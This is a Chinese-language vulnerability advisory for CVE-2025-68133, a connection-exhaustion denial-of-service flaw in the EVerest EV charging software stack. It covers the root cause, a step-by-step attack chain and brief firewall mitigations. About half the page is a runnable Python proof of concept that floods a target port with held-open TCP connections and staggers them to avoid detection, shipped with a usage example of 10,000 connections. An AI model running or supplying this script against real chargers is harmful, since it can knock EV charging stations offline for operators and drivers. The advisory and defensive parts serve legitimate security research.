CVE-2025-68133 EVerest EV充电软件栈拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-68133

漏洞类型

拒绝服务/资源耗尽

CVSS评分

7.4 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EVerest (everest-core)

漏洞概述

EVerest是一个开源的电动汽车充电软件栈，广泛应用于EVSE（电动汽车供电设备）模块。在2025.9.0及更早版本中，存在一个严重的安全漏洞，攻击者可以通过发起无限数量的TCP连接来耗尽系统资源。由于该软件在为每个传入的TCP或TLS连接创建线程时缺乏适当的资源限制和验证机制，攻击者可以在无需认证的情况下持续建立连接而不进行后续的ISO 15118-2通信协议握手。这导致系统内存被耗尽，最终造成EVerest进程及其所有模块异常关闭，从而影响整个EVSE充电功能的正常运行。该漏洞的CVSS评分为7.4，属于高危级别，对可用性造成严重影响。

技术细节

该漏洞的根本原因在于EVerest对TCP连接处理的架构设计缺陷。当客户端发起TCP连接请求时，服务器端会立即为每个连接创建一个新的处理线程，这个操作发生在任何身份验证或连接有效性检查之前。同时，现有的连接验证机制过于宽松，无法有效识别和拒绝恶意的大量连接请求。攻击者可以利用这一点，通过自动化工具快速创建数千甚至数万个TCP连接，每个连接都会占用一定的文件描述符和内存资源。由于这些连接保持打开状态但不进行正常的协议交互，服务器端的线程池和内存资源会被迅速耗尽。当系统资源达到临界值时，EVerest主进程和所有子模块将无法继续运行，最终导致服务完全中断。此攻击向量为邻接网络（AV:A），意味着攻击者需要处于与目标系统相同的网络邻域中，如同一局域网或物理邻近位置。

攻击链分析

STEP 1

1

攻击者位于与EVerest服务器相同的网络邻域中（如同一局域网）

STEP 2

2

攻击者识别目标EVerest服务的TCP端口（通常为8849端口用于ISO 15118通信）

STEP 3

3

攻击者使用自动化工具或脚本发起大量TCP连接请求

STEP 4

4

EVerest服务器为每个连接创建新线程，消耗系统资源（文件描述符、内存）

STEP 5

5

攻击者不完成TLS握手或ISO 15118协议，保持连接处于半开状态

STEP 6

6

随着连接数量增加，系统内存和文件描述符被耗尽

STEP 7

7

EVerest主进程和所有模块因资源不足而崩溃，导致EVSE功能完全中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-68133 PoC - EVerest TCP Connection Exhaustion
This PoC demonstrates the resource exhaustion vulnerability in EVerest
by creating multiple TCP connections that never complete TLS handshake.
"""

import socket
import threading
import time
import sys

def create_tcp_connection(target_host, target_port, connection_id):
    """Create a TCP connection and keep it open"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))
        # Send incomplete TLS ClientHello or nothing
        # Connection will stay open consuming resources
        print(f"[Connection {connection_id}] Established")
        # Keep connection alive
        while True:
            time.sleep(60)
    except Exception as e:
        print(f"[Connection {connection_id}] Failed: {e}")

def attack(target_host, target_port, num_connections):
    """Launch the DoS attack by creating multiple connections"""
    print(f"[*] Starting attack on {target_host}:{target_port}")
    print(f"[*] Creating {num_connections} connections...")
    
    threads = []
    for i in range(num_connections):
        t = threading.Thread(
            target=create_tcp_connection,
            args=(target_host, target_port, i+1)
        )
        t.daemon = True
        t.start()
        threads.append(t)
        
        # Stagger connections slightly to avoid immediate detection
        if i % 100 == 0:
            time.sleep(0.1)
    
    print(f"[*] {num_connections} connections established")
    print(f"[*] Attack in progress... Press Ctrl+C to stop")
    
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[*] Stopping attack...")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-68133-poc.py <target_host> <port> <num_connections>")
        print("Example: python cve-2025-68133-poc.py 192.168.1.100 8849 10000")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2])
    connections = int(sys.argv[3])
    
    attack(target, port, connections)

影响范围

EVerest everest-core <= 2025.9.0

防御指南

临时缓解措施

在网络边界配置防火墙或负载均衡器，限制来自单个源IP的并发连接数量；启用系统级连接超时和资源限制；监控网络流量以识别异常的连接模式。同时建议将EVerest服务部署在隔离的网络区域，限制潜在攻击者的网络访问范围。